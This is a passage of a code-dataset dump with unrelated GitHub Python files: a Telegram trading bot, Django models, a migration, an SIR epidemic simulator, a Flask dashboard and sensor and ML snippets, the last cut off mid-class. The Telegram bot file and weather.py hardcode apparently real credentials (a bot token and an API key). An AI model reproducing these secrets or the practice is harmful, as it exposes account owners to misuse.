telebot.TeleBot(\"1176972608:AAHcIepUT9iM7Pi6H2cBv3KO3bwXRkh1gK0\")\nconn = sqlite3.connect(\"inventory.db\")\n\ndef create_table():\n conn.execute(\"CREATE TABLE IF NOT EXISTS items (item TEXT, price INTEGER)\")\n\n@bot.message_handler(commands=['start'])\ndef start_handler(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True, selective=True)\n markup.add(\"Buy Item\", \"Sell Item\")\n bot.send_message(chat_id=message.from_user.id, text=\"Welcome! 
Choose an option.\", reply_markup=markup)\n\n@bot.message_handler(func=lambda message: message.text == \"Buy Item\")\ndef buy_handler(message):\n bot.send_message(chat_id=message.from_user.id, text=\"Which item would you like to buy?\")\n\n@bot.message_handler(func=lambda message: message.text == \"Sell Item\")\ndef sell_handler(message):\n bot.send_message(chat_id=message.from_user.id, text=\"What is the name and price of the item you want to sell?\")\n\n@bot.message_handler(func=lambda message: \"buy\" in message.text.lower())\ndef buy_confirm_handler(message):\n parts = message.text.split(\" \")\n item = parts[1]\n cursor = conn.execute(\"SELECT price FROM items WHERE item=?\", (item,))\n row = cursor.fetchone()\n\n if row is None:\n bot.send_message(chat_id=message.from_user.id, text=\"Item not found.\")\n else:\n price = row[0]\n bot.send_message(chat_id=message.from_user.id, text=\"Item found for {} coins. Do you want to buy it?\".format(price))\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True, selective=True)\n markup.add(\"Yes\", \"No\")\n bot.send_message(chat_id=message.from_user.id, text=\"Do you want to buy it?\", reply_markup=markup)\n\n@bot.message_handler(func=lambda message: \"sell\" in message.text.lower())\ndef sell_confirm_handler(message):\n parts = message.text.split(\" \")\n item = parts[1]\n price = parts[2]\n\n conn.execute(\"INSERT INTO items (item, price) VALUES (?, ?)\", (item, price))\n conn.commit()\n\n bot.send_message(chat_id=message.from_user.id, text=\"Item sold.\")\n\ncreate_table()\nbot.polling()\n","repo_name":"daliroff/Telegram","sub_path":"tgbot.py","file_name":"tgbot.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37448851452","text":"from django.db import models\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass Jasoseol(models.Model): #models.Model을 상속 받아서 Jasoseol 모델 제작(첫글자 대문자)\n title = models.CharField(max_length=50) #제목에 짧은 문자열(50자 제한 필수)\n content = models.TextField() #내용에 긴 문자열 입력 가능\n undated_at = models.DateTimeField(auto_now=True) #날짜와 시간을 받을 수 있게함(자동 업데이트 저장)\n author = models.ForeignKey(User, on_delete=models.CASCADE) #FK로 연결로 객체를 지움\n\nclass Comment(models.Model): #models.Model을 상속 받아 Comment 모델 제작(첫글자 대문자)\n content = models.CharField(max_length=100) #내용에 짧은 문자열 100자 이내\n author = models.ForeignKey(User, on_delete=models.CASCADE) #FK로 연결로 객체를 지움(이용자)\n jasoseol = models.ForeignKey(Jasoseol, on_delete=models.CASCADE) #FK로 연결로 객체를 지움(자소서)","repo_name":"Jaejuneeyo/DJANGO-JssProject","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43893620701","text":"\"\"\"add index on auth_token session_uuid\n\nRevision ID: 6834e544e667\nRevises: 6ab0ef651dcd\n\n\"\"\"\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '6834e544e667'\ndown_revision = '6ab0ef651dcd'\n\n\ndef upgrade():\n # What we should be careful of: some production systems already have the index in place\n # since it was fixed by support\n idx_to_rename = {\n 'auth_token_session_uuid_idx': 'auth_token__idx__session_uuid',\n }\n conn = op.get_bind()\n for idx, idx_renamed in idx_to_rename.items():\n conn.execute(f'ALTER INDEX IF EXISTS {idx} RENAME TO {idx_renamed};')\n\n conn.execute(\n 'CREATE INDEX IF NOT EXISTS auth_token__idx__session_uuid ON auth_token 
(session_uuid);'\n    )\n\n\ndef downgrade():\n    op.drop_index('auth_token__idx__session_uuid')\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/database/alembic/versions/6834e544e667_add_index_on_auth_token_session_uuid.py","file_name":"6834e544e667_add_index_on_auth_token_session_uuid.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
+{"seq_id":"74268932853","text":"def sort_word(word):\n    char_count = [0] * 256\n    for char in word:\n        char_count[ord(char)] += 1\n\n    for i in range(1, 256):\n        char_count[i] += char_count[i-1]\n\n    result = [None] * len(word)\n    for char in word:\n        result[char_count[ord(char)] - 1] = char\n        char_count[ord(char)] -= 1\n\n    return ''.join(result)\n\n\ndef is_anagram(first_string, second_string):\n    if not first_string and not second_string:\n        return (first_string, second_string, False)\n\n    first_string = first_string.lower().replace(\" \", \"\")\n    second_string = second_string.lower().replace(\" \", \"\")\n\n    first_string_sorted = sort_word(first_string)\n    second_string_sorted = sort_word(second_string)\n\n    if first_string_sorted == second_string_sorted:\n        return (first_string_sorted, second_string_sorted, True)\n    else:\n        return (first_string_sorted, second_string_sorted, False)\n","repo_name":"Edson1206/project-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17159128507","text":"import requests\n\napi_key = \"0505751a83b53a0600c6fa19bbb62039\"\ncity = \"Orlando\"\nurl = \"http://api.openweathermap.org/data/2.5/weather?q=\"+city+\"&appid=\"+api_key+\"&units=imperial\"\n\nrequest = requests.get(url)\njson = request.json()\n# print(json)\n\ndescription = json.get(\"weather\")[0].get(\"description\")\nprint(\"Today's forecast is\", description)\n\ntemp_min = json.get(\"main\").get(\"temp_min\")\nprint(\"The minimum temperature is\", temp_min)\ntemp_max = json.get(\"main\").get(\"temp_max\")\nprint(\"The maximum temperature is\", temp_max)\n","repo_name":"TateMerrill/practical-python","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6065950399","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 22 18:22:32 2021\n\n@author: changkai\n\"\"\"\n\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy.sparse.linalg as spla\nfrom Regions import Regions\nfrom Region_SIR import RGN_SIR\nimport itertools as it\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass SIR(Regions):\n    \n    # outflow coefficients\n    # returns a dictionary with region names being the keys\n    def OFC(self, dict_):\n        mc = self.mobilityCoef(dict_)\n        keyMat = self.keyMat()\n        n = len(self.regions)\n        ofc = {}\n        for i in range(n):\n            tempCS = 0\n            tempCI = 0\n            tempCR = 0\n            for j in range(n):\n                if i != j:\n                    key = keyMat[i,j]\n                    tempCS = tempCS + mc[key][3]\n                    tempCI = tempCI + mc[key][4]\n                    tempCR = tempCR + mc[key][5]\n\n            name = self.regions[i].name\n            ofc[name] = [tempCS, tempCI, tempCR]\n        \n        return ofc\n    \n    # build diagonal blocks\n    def diagBlock(self, dict_, idx):\n        ofc = self.OFC(dict_)\n        name = self.regions[idx].name\n        curOFC = ofc[name]\n        curOFC = [-1 * item for item in curOFC] # take the negative value\n        block = 
sp.diags(curOFC, 0, shape=[3,3], format = 'csr')\n        \n        return block\n    \n    # build a 3x3 block matrix\n    def Block(self, dict_, row, col):\n        mc = self.mobilityCoef(dict_)\n        keyMat = self.keyMat()\n        if row == col:\n            block = self.diagBlock(dict_, row)\n        else:\n            key = keyMat[row, col]\n            tempCoef = mc[key]\n            block = sp.diags(tempCoef[0:3], 0, shape=[3,3], format='csr')\n        return block\n    \n    # the linear matrix\n    def AL(self, dict_):\n        n = len(self.regions)\n        row1 = self.Block(dict_, 0, 0) \n        \n        for col in range(1,n):\n            tempBlock = self.Block(dict_, 0, col)\n            row1 = sp.hstack([row1, tempBlock])\n        \n        Al = row1\n        for row in range(1,n):\n            tempRow = self.Block(dict_, row, 0)\n            for col in range(1,n):\n                tempBlock = self.Block(dict_, row, col)\n                tempRow = sp.hstack([tempRow, tempBlock])\n            Al = sp.vstack([Al, tempRow])\n        \n        return Al\n    \n    # u is of shape (m,1); numpy array\n    # return the dictionary containing the nonlinear terms of each region\n    # in the order of S, I, R\n    # def NLC(self, u):\n    #     nlc = {}\n    #     n = len(self.regions)\n    #     ut = u\n    #     m = ut.shape[0]\n    #     ut = ut.reshape(1,m).squeeze()\n    #     ut = ut.tolist()\n    #     for i in range(n):\n    #         name = self.regions[i].name\n    #         nlc[name] = ut[3*i:(3*(i+1))]\n    #     return nlc\n    \n    # return the nonlinear matrix (depending on u)\n    def ANL(self, u):\n        \n        n = len(self.regions)\n        B0 = sp.diags([0.], shape=[3, 3], format = 'csr') # zero block\n        \n        ut = u.reshape(1,3*n).squeeze()\n        ut = ut.tolist()\n        \n        # the first row\n        region1 = self.regions[0]\n        S1, I1, R1 = ut[0:3]\n        c1 = [-region1.beta*I1/region1.N, region1.beta*S1/region1.N-region1.gamma, 0]\n        row1 = sp.diags(c1, 0, shape = [3,3], format = 'csr')\n        row1[2,1] = region1.gamma\n        for i in range(1,n):\n            row1 = sp.hstack([row1, B0])\n\n        # initialize the resultant matrix with the first row\n        Anl = row1\n        \n        # loop over rows\n        for i in range(1,n):\n            # the first block of tempRow is a zero block\n            tempRow = B0\n            \n            # stack each column\n            for j in range(1,n):\n                if i == j:\n                    region = self.regions[i]\n                    S, I, R = ut[3*i:3*(i+1)]\n                    c = [-region.beta*I/region.N, region.beta*S/region.N-region.gamma, 0]\n                    tempBlock = sp.diags(c, 0, shape = [3,3], format = 'csr')\n                    tempBlock[2,1] = region.gamma\n                else:\n                    tempBlock = B0\n                tempRow = sp.hstack([tempRow, tempBlock])\n            \n            # stack each row\n            Anl = sp.vstack([Anl, tempRow])\n        \n        return Anl\n    \n    def Heun(self, dict_, dt, Tf, Ti=0):\n        \n        # define problem\n        n = int((Tf - Ti)/dt)\n        u0 = self.u0()\n        Al = self.AL(dict_)\n        Anl = self.ANL(u0)\n        Au = Al + Anl\n        u = u0\n        # matrix that stores result\n        U = u \n        for i in range(n):\n            \n            # predictor (explicit Euler step: up = u + dt*f(u))\n            up = u + dt*Au.dot(u)\n            \n            # corrector\n            u = u + dt/2*(Au.dot(u) + Au.dot(up))\n            \n            # append result\n            U = np.append(U, u, axis=1)\n            \n            # update ANL\n            Anl = self.ANL(u)\n            \n            # update Au\n            Au = Al + Anl\n        \n        return U\n    \n    def plot_Heun(self, dict_, index, dt, Tf, Ti=0, save = False):\n        U = self.Heun(dict_, dt, Tf)\n        n = int((Tf-Ti)/dt)+1\n        tvals = np.linspace(Ti, Tf, n)\n        fig, ax = plt.subplots()\n\n        for j in range(3):\n            if j == 0:\n                Label = self.regions[index].name + '-S'\n            elif j == 1:\n                Label = self.regions[index].name + '-I'\n            else:\n                Label = self.regions[index].name + '-R'\n            \n            ax.plot(tvals, U[index*3+j,:], label = Label)\n        \n        ax.legend(loc = 'right')\n        plt.show()\n        if save:\n            filename = self.regions[index].name + '.png'\n            fig.savefig(filename)\n    \n    def plotAll_Heun(self, dict_, dt, Tf, Ti=0):\n        U = self.Heun(dict_, dt, Tf)\n        numRegion = len(self.regions)\n        n = int((Tf-Ti)/dt)+1\n        tvals = np.linspace(Ti, Tf, n)\n        fig, ax = plt.subplots()\n        for i in 
range(numRegion):\n            for j in range(3):\n                if j == 0:\n                    Label = self.regions[i].name + '-S'\n                elif j == 1:\n                    Label = self.regions[i].name + '-I'\n                else:\n                    Label = self.regions[i].name + '-R'\n                \n                ax.plot(tvals, U[i*3+j,:], label = Label)\n        \n        ax.legend(loc = 'upper right')\n        plt.show()\n","repo_name":"HowardYutingHou/CovidProject","sub_path":"Kai/SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"37312323185","text":"from glob import glob\r\nimport json\r\n\r\npattern = 'U:/RU Moscow A101 Scandinavia/Stage II/**/DWG/*.dwg'\r\n\r\nfiles = glob(pattern, recursive=True)\r\n\r\nwith open('sisu_scan_out.json', 'wb') as f:\r\n\tdata = {\r\n\t\t'files': files,\r\n\t}\r\n\traw = json.dumps(data, indent=4, ensure_ascii=False)\r\n\tf.write(raw.encode('utf-8'))\r\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"42921075495","text":"def estritamente_crescente (lista):\n    final = []\n    if (len(lista) > 1):\n        maior = lista[0]\n        final.append(lista[0])\n        for e in lista:\n            if(e > maior):\n                maior = e\n                final.append(e)\n    return final","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_332/ch51_2019_04_03_15_12_46_358977.py","file_name":"ch51_2019_04_03_15_12_46_358977.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2911328301","text":"import json\n\nclass Request:\n    prompt: str = \"\"\n    init_image: str = None # base64\n    mask: str = None # base64\n    num_outputs: int = 1\n    num_inference_steps: int = 50\n    guidance_scale: float = 7.5\n    width: int = 512\n    height: int = 512\n    seed: int = 42\n    prompt_strength: float = 0.8\n    # allow_nsfw: bool = False\n    precision: str = \"autocast\" # or \"full\"\n    save_to_disk_path: str = None\n    turbo: bool = True\n    use_cpu: bool = False\n    use_full_precision: bool = False\n    use_face_correction: str = None # or \"GFPGANv1.3\"\n    use_upscale: str = None # or \"RealESRGAN_x4plus\" or \"RealESRGAN_x4plus_anime_6B\"\n    show_only_filtered_image: bool = False\n\n    def json(self):\n        return {\n            \"prompt\": self.prompt,\n            \"num_outputs\": self.num_outputs,\n            \"num_inference_steps\": self.num_inference_steps,\n            \"guidance_scale\": self.guidance_scale,\n            \"width\": self.width,\n            \"height\": self.height,\n            \"seed\": self.seed,\n            \"prompt_strength\": self.prompt_strength,\n            \"use_face_correction\": self.use_face_correction,\n            \"use_upscale\": self.use_upscale,\n        }\n\n    def to_string(self):\n        return f'''\n    prompt: {self.prompt}\n    seed: {self.seed}\n    num_inference_steps: {self.num_inference_steps}\n    guidance_scale: {self.guidance_scale}\n    w: {self.width}\n    h: {self.height}\n    precision: {self.precision}\n    save_to_disk_path: {self.save_to_disk_path}\n    turbo: {self.turbo}\n    use_cpu: {self.use_cpu}\n    use_full_precision: {self.use_full_precision}\n    use_face_correction: {self.use_face_correction}\n    use_upscale: {self.use_upscale}\n    show_only_filtered_image: {self.show_only_filtered_image}'''\n\nclass Image:\n    data: str # base64\n    seed: int\n    is_nsfw: bool\n    path_abs: str = None\n\n    def __init__(self, data, seed):\n        self.data = data\n        self.seed = seed\n\n    def json(self):\n        return {\n            \"data\": self.data,\n            \"seed\": self.seed,\n            \"path_abs\": 
self.path_abs,\n }\n\nclass Response:\n request: Request\n session_id: str\n images: list\n\n def json(self):\n res = {\n \"status\": 'succeeded',\n \"session_id\": self.session_id,\n \"request\": self.request.json(),\n \"output\": [],\n }\n\n for image in self.images:\n res[\"output\"].append(image.json())\n\n return res\n","repo_name":"rcdsp/stable-diffusion-ui","sub_path":"ui/sd_internal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"34800352770","text":"import Adafruit_DHT\n\nsensor = Adafruit_DHT.DHT11\nDHT_PIN = 4\n\ntry:\n while True:\n shi, wen = Adafruit_DHT.read_retry(sensor, DHT_PIN)\n if shi is not None and wen is not None:\n print(\"Temperature: %.1lf℃\" % wen)\n print(\"Humidity: %.1lf%%\" % shi)\n else:\n print(\"Read Error\")\nfinally:\n print(\"system exit\")","repo_name":"chunzhi23/2021_IoT_RaspberryPi","sub_path":"03_high_level_sensor/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18179340594","text":"import io\nimport json\nimport os\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError as GoogleHttpError\nfrom googleapiclient.http import MediaIoBaseUpload\nimport requests\n\nfrom progress_bar import ProgressBar\n\n\nclass GoogleDrive:\n gd_url = ['https://www.googleapis.com/auth/drive'] \n\n def __init__(self):\n self.creds = None\n\n if os.path.exists('token.json'):\n self.creds = Credentials.from_authorized_user_file('token.json', self.gd_url)\n\n if not self.creds or not self.creds.valid:\n if self.creds and self.creds.expired and self.creds.refresh_token:\n self.creds.refresh(Request())\n else:\n self.flow = InstalledAppFlow.from_client_secrets_file(\n './../cred.json', self.gd_url)\n self.creds = self.flow.run_local_server(port=0)\n\n with open('token.json', 'w') as token:\n token.write(self.creds.to_json())\n\n self.service = build('drive', 'v3', credentials=self.creds) \n\n def create_directory_on_google_drive(self, dir_name):\n \"\"\"Сreates a new directory on Google Drive\n\n Keyword Arguments:\n - dir_name -- directory to be created\n\n \"\"\"\n\n try:\n file_metadata = {\n 'name': dir_name,\n 'mimeType': 'application/vnd.google-apps.folder',\n }\n file = self.service.files().create(body=file_metadata,\n fields='id').execute() \n return file.get(\"id\") \n except GoogleHttpError as error:\n print(f'An error occurred: {error}') \n \n def upload_photo_to_google_drive(self, file_path, dir_id, url):\n \"\"\"Uploads a photo to Google Drive\n\n Keyword Arguments:\n - file_path -- path to the file on Google Drive\n - dir_id -- id of the directory in which the files are uploaded\n - url -- link to download file\n\n \"\"\" \n\n vk_image = requests.get(url)\n fh = io.BytesIO()\n fh.write(vk_image.content)\n\n media = MediaIoBaseUpload(fh, mimetype='image/jpg') \n\n file_metadata = { \n 'name' : file_path,\n 'parents': [dir_id]\n }\n\n self.service.files().create(\n body=file_metadata, media_body=media, fields='id').execute()\n\n def parse_vkontakte_response_and_make_backup_photo_on_google_drive(self, resp, dir_id, number_of_photos_to_save=5):\n \"\"\"Uploads a photo to Google Drive\n\n Keyword Arguments:\n - 
resp -- VKontakte data with photo information\n        - dir_id -- id of the directory on Google Drive in which you want to save the photos\n        - number_of_photos_to_save -- number of photos to save\n\n        \"\"\" \n\n        prog_bar = ProgressBar()\n        prog_bar.printProgressBar(0, len(resp['response']['items']))\n        json_result = []\n        photos_name = []\n        image_type = \"\"\n        image_url = \"\"\n\n        for i, item in enumerate(resp['response']['items'], 1):\n            image_likes = item['likes']['count']\n            max_image_size = -1\n            for size in item['sizes']:\n                image_size = size['height'] + size['width']\n                if image_size > max_image_size:\n                    max_image_size = image_size\n                    image_url = size['url']\n                    image_type = size['type'] \n\n            json_result.append({'file_name': f'{image_likes}.jpg', 'size': image_type})\n            \n            if f'{image_likes}.jpg' in photos_name:\n                self.upload_photo_to_google_drive(f'{dir_id}/{image_likes}-{item[\"date\"]}.jpg', dir_id, image_url)\n            else:\n                self.upload_photo_to_google_drive(f'{dir_id}/{image_likes}.jpg', dir_id, image_url)\n                photos_name.append(f'{image_likes}.jpg')\n\n            if number_of_photos_to_save < len(resp['response']['items']):\n                prog_bar.printProgressBar(i, number_of_photos_to_save)\n            else:\n                prog_bar.printProgressBar(i, len(resp['response']['items']))\n\n            if number_of_photos_to_save == i:\n                break\n\n        with open('result.json', 'w') as file:\n            json.dump(json_result, file, indent=4)","repo_name":"GeliosI/CourseWork","sub_path":"src/google_drive.py","file_name":"google_drive.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30539449344","text":"from pathlib import Path\n\nimport numpy as np\n\nfrom py_abm.visualization.parser import ExperimentParser\nfrom py_abm.visualization.plots import Convergence\n\n\ndef create_convergence_graph(results_paths):\n    exp_results = []\n    rmse_values = []\n\n    for path in results_paths:\n        exp_results.append(ExperimentParser(path))\n\n    for result in exp_results:\n        rmse_values.append(np.array([r['RMSE']\n                                     for r in result.best_fitness_per_milestone]))\n\n    average_best_fitness = np.mean(rmse_values, axis=0)\n\n    plot = Convergence(values=average_best_fitness,\n                       labels=exp_results[0].milestones)\n    return plot\n","repo_name":"moesio-f/py-abm-public","sub_path":"experiments/visualization/convergence.py","file_name":"convergence.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16069057516","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef main_page(request):\n    output = '''\n    <html>\n    <head>\n    <title>%s</title>\n    </head>\n    <body>\n    <h1>%s</h1>\n    <p>%s</p>\n    </body>\n    </html>\n    
''' % ( \n        '장고 | 북마크',\n        '장고 북마크 웰컴!',\n        '북마크 저장해 줘요~'\n    )\n\n    return HttpResponse(output)\n","repo_name":"niceman114/django-test","sub_path":"django_bookmarks/bookmarks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26656058331","text":"# Program file for the Flask server that runs on the\n# Local Operations System\n# ECD109\n# Denis Nakazawa\n\nimport sqlite3\n\nfrom energy_information_database import *\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef render_local_interface():\n    time_stamp, real_power_min, real_power_max, real_power_avg, reactive_power_min, reactive_power_max, reactive_power_avg, voltage_min, voltage_max, voltage_avg, current_min, current_max, current_avg, energy = retrieve_last_database_entry()\n    \n    template_data = {\n        'timeStamp' : time_stamp,\n        'realPowerMin' : real_power_min,\n        'realPowerMax' : real_power_max,\n        'realPowerAvg' : real_power_avg,\n        'reactivePowerMin' : reactive_power_min,\n        'reactivePowerMax' : reactive_power_max,\n        'reactivePowerAvg' : reactive_power_avg,\n        'voltageMin' : voltage_min,\n        'voltageMax' : voltage_max,\n        'voltageAvg' : voltage_avg,\n        'currentMin' : current_min,\n        'currentMax' : current_max,\n        'currentAvg' : current_avg,\n        'energy' : energy\n    }\n    \n    return render_template('index.html', **template_data)\n\nif __name__ == \"__main__\":\n    app.run(host = '192.168.1.91', port = 24, debug = True)","repo_name":"StaleGummyBear/ECD310","sub_path":"Remote Source Code/ecd210-rpi-flask-files/flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4132639746","text":"from .utils_model import *\nMULT = 2\n\n\ndef endpoint_error(\n\t\ty_true: torch.Tensor,\n\t\ty_pred: torch.Tensor,\n\t\tdim: int = 1, ):\n\tepe = torch.linalg.norm(\n\t\ty_true - y_pred, dim=dim)\n\tepe = torch.sum(epe, dim=[1, 2])\n\treturn epe\n\n\ndef endpoint_error_batch(\n\t\ty_true: torch.Tensor,\n\t\ty_pred: torch.Tensor,\n\t\tbatch: int = 512,\n\t\tdim: int = 1, ):\n\tdelta = y_true - y_pred\n\tepe = []\n\tn = int(np.ceil(len(y_true) / batch))\n\tfor i in range(n):\n\t\ta = i * batch\n\t\tb = min((i+1) * batch, len(y_true))\n\t\tepe.append(torch.linalg.norm(\n\t\t\tdelta[range(a, b)], dim=dim,\n\t\t))\n\tepe = torch.cat(epe)\n\tepe = torch.sum(epe, dim=[1, 2])\n\treturn epe\n\n\ndef get_stride(cell_type: str, cmult: int):\n\tstartswith = cell_type.split('_')[0]\n\tif startswith in ['normal', 'combiner']:\n\t\tstride = 1\n\telif startswith == 'down':\n\t\tstride = cmult\n\telif startswith == 'up':\n\t\tstride = -1\n\telse:\n\t\traise NotImplementedError(cell_type)\n\treturn stride\n\n\ndef get_skip_connection(\n\t\tci: int,\n\t\tcmult: int,\n\t\tstride: Union[int, str],\n\t\treg_lognorm: bool = True, ):\n\tif isinstance(stride, str):\n\t\tstride = get_stride(stride, cmult)\n\tif stride == 1:\n\t\treturn nn.Identity()\n\telif stride in [2, 4]:\n\t\treturn FactorizedReduce(\n\t\t\tci=ci,\n\t\t\tco=int(cmult*ci),\n\t\t\treg_lognorm=reg_lognorm,\n\t\t)\n\telif stride == -1:\n\t\treturn nn.Sequential(\n\t\t\tnn.Upsample(\n\t\t\t\tscale_factor=cmult,\n\t\t\t\tmode='nearest'),\n\t\t\tConv2D(\n\t\t\t\tkernel_size=1,\n\t\t\t\tin_channels=ci,\n\t\t\t\tout_channels=int(ci/cmult),\n\t\t\t\treg_lognorm=reg_lognorm),\n\t\t)\n\telse:\n\t\traise 
NotImplementedError(stride)\n\n\ndef get_act_fn(\n\t\tfn: str,\n\t\tinplace: bool = False,\n\t\t**kwargs, ):\n\tif fn == 'none':\n\t\treturn None\n\telif fn == 'relu':\n\t\treturn nn.ReLU(inplace=inplace)\n\telif fn == 'swish':\n\t\treturn nn.SiLU(inplace=inplace)\n\telif fn == 'elu':\n\t\treturn nn.ELU(inplace=inplace, **kwargs)\n\telif fn == 'softplus':\n\t\treturn nn.Softplus(**kwargs)\n\telse:\n\t\traise NotImplementedError(fn)\n\n\nclass FactorizedReduce(nn.Module):\n\tdef __init__(self, ci: int, co: int, **kwargs):\n\t\tsuper(FactorizedReduce, self).__init__()\n\t\tassert co % 2 == 0 and co > 4\n\t\tco_each = co // 4\n\t\tdefaults = {\n\t\t\t'kernel_size': 1,\n\t\t\t'in_channels': ci,\n\t\t\t'out_channels': co_each,\n\t\t\t'reg_lognorm': True,\n\t\t\t'stride': co // ci,\n\t\t\t'padding': 0,\n\t\t\t'bias': True,\n\t\t}\n\t\tkwargs = setup_kwargs(defaults, kwargs)\n\t\tself.swish = nn.SiLU()\n\t\tself.ops = nn.ModuleList()\n\t\tfor i in range(3):\n\t\t\tself.ops.append(Conv2D(**kwargs))\n\t\tkwargs['out_channels'] = co - 3 * co_each\n\t\tself.ops.append(Conv2D(**kwargs))\n\n\tdef forward(self, x):\n\t\tx = self.swish(x)\n\t\tidx, out = 0, []\n\t\tfor op in self.ops:\n\t\t\ti, j = idx // 2, idx % 2\n\t\t\tout.append(op(x[..., i:, j:]))\n\t\t\tidx += 1\n\t\treturn torch.cat(out, dim=1)\n\n\nclass SELayer(nn.Module):\n\tdef __init__(self, ci: int, reduc: int = 16):\n\t\tsuper(SELayer, self).__init__()\n\t\tself.hdim = max(ci // reduc, 4)\n\t\tself.fc = nn.Sequential(\n\t\t\tnn.Linear(ci, self.hdim), nn.ReLU(inplace=True),\n\t\t\tnn.Linear(self.hdim, ci), nn.Sigmoid(),\n\t\t)\n\n\tdef forward(self, x):\n\t\tb, c, _, _ = x.size()\n\t\tse = torch.mean(x, dim=[2, 3])\n\t\tse = self.fc(se).view(b, c, 1, 1)\n\t\treturn x * se\n\n\nclass Cell(nn.Module):\n\tdef __init__(\n\t\t\tself,\n\t\t\tci: int,\n\t\t\tco: int,\n\t\t\tn_nodes: int,\n\t\t\tcell_type: str,\n\t\t\tact_fn: str,\n\t\t\tuse_bn: bool,\n\t\t\tuse_se: bool,\n\t\t\tscale: float,\n\t\t\teps: float,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(Cell, self).__init__()\n\t\tassert n_nodes >= 1\n\t\tkws_skip = filter_kwargs(\n\t\t\tget_skip_connection, kwargs)\n\t\tself.skip = get_skip_connection(\n\t\t\tci, MULT, cell_type, **kws_skip)\n\t\tself.ops = nn.ModuleList()\n\t\tfor i in range(n_nodes):\n\t\t\top = ConvLayer(\n\t\t\t\tci=ci if i == 0 else co,\n\t\t\t\tco=co,\n\t\t\t\tstride=get_stride(cell_type, MULT)\n\t\t\t\tif i == 0 else 1,\n\t\t\t\tact_fn=act_fn,\n\t\t\t\tuse_bn=use_bn,\n\t\t\t\tinit_scale=scale\n\t\t\t\tif i+1 == n_nodes\n\t\t\t\telse 1.0,\n\t\t\t\t**kwargs,\n\t\t\t)\n\t\t\tself.ops.append(op)\n\t\tif use_se:\n\t\t\tself.se = SELayer(co)\n\t\telse:\n\t\t\tself.se = None\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tskip = self.skip(x)\n\t\tfor op in self.ops:\n\t\t\tx = op(x)\n\t\tif self.se is not None:\n\t\t\tx = self.se(x)\n\t\treturn skip + self.eps * x\n\n\nclass ConvLayer(nn.Module):\n\tdef __init__(\n\t\t\tself,\n\t\t\tci: int,\n\t\t\tco: int,\n\t\t\tstride: int,\n\t\t\tact_fn: str,\n\t\t\tuse_bn: bool,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(ConvLayer, self).__init__()\n\t\tdefaults = {\n\t\t\t'in_channels': ci,\n\t\t\t'out_channels': co,\n\t\t\t'kernel_size': 3,\n\t\t\t'normalize_dim': 0,\n\t\t\t'reg_lognorm': True,\n\t\t\t'init_scale': 1.0,\n\t\t\t'stride': abs(stride),\n\t\t\t'padding': 1,\n\t\t\t'dilation': 1,\n\t\t\t'groups': 1,\n\t\t\t'bias': True,\n\t\t}\n\t\tif stride == -1:\n\t\t\tself.upsample = nn.Upsample(\n\t\t\t\tscale_factor=MULT,\n\t\t\t\tmode='nearest',\n\t\t\t)\n\t\telse:\n\t\t\tself.upsample = None\n\t\tif 
